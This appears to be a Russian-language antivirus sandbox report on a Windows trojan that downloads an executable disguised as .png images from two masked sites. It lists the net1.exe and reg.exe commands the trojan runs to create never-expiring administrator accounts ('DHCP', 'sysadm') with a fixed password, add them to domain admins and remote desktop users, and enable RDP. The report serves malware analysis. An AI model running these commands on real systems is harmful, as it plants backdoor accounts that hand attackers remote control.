Техническая информация
- '%TEMP%\winl3.exe'
- '%TEMP%\winl3.exe' (загружен из сети Интернет)
- '<SYSTEM32>\net1.exe' group "domain admins" DHCP /add
- '<SYSTEM32>\net1.exe' localgroup "remote desktop users" DHCP /add
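- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s DHCP /add (по-видимому, имя группы — Administrators: среда анализа, вероятно, подставила %USERNAME% вместо имени учётной записи Administrator; требует проверки)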
- '<SYSTEM32>\net1.exe' user DHCP /active:yes
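- '<SYSTEM32>\reg.exe' add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0 /f (значение 0 параметра fDenyTSConnections разрешает входящие подключения к удалённому рабочему столу)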
- '<SYSTEM32>\net1.exe' user DHCP h3lp_desk
- '<SYSTEM32>\net1.exe' user DHCP /expires:never
- '<SYSTEM32>\net1.exe' user DHCP h3lp_desk /expires:never /add
- '<SYSTEM32>\net1.exe' localgroup "remote desktop users" sysadm /add
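- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s sysadm /add (по-видимому, имя группы — Administrators: среда анализа, вероятно, подставила %USERNAME% вместо имени учётной записи Administrator; требует проверки)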
- '<SYSTEM32>\net1.exe' user sysadm h3lp_desk /expires:never /add
- '<SYSTEM32>\net1.exe' group "domain admins" sysadm /add
- '<SYSTEM32>\net1.exe' user sysadm h3lp_desk
- '<SYSTEM32>\net1.exe' user sysadm /expires:never
- '<SYSTEM32>\net1.exe' user sysadm /active:yes
- AVP.EXE
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\swsoft[1].png
- %TEMP%\winl3.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\logo10[1].png
- %TEMP%\craft.ini
- 'sn#p.jp':80
- 'fo#####travel.com.my':80
- sn#p.jp/wordpress/wp-admin/images/swsoft.png
- fo#####travel.com.my/images/logo10.png
- DNS ASK sn#p.jp
- DNS ASK fo#####travel.com.my
- ClassName: 'Shell_TrayWnd' WindowName: ''